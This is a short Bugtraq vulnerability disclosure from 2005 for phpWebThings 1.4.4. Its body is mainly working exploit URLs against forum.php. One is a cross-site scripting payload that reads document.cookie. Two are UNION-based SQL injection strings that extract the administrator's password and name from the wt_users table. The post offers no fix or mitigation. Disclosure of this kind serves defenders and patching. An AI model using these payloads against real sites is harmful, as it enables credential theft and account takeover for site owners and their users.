[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
XSS & SQL injection in phpWebThing
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: XSS & SQL injection in phpWebThing
- From: xx_hack_xx_2004@xxxxxxxxxxx
- Date: 5 Nov 2005 03:00:11 -0000
Vulnerable: phpWebThings 1.4.4
http://phpwebthings.org
The bug reside in : forum.php
Exploit :
http://xxx.com/forum.php?forum=[XSS]
http://xxx.com/forum.php?forum=[SQL]
Example :
XSS
http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script>
SQL
For Passowrd
http://xxx.com/forum.php?forum=-1 union select
password,password,null,null,null,null from wt_users where uid=1/*
For Name
http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null
from wt_users where uid=1/*
Discovery by Linux_Drox
http://www.lezr.com
Best Regards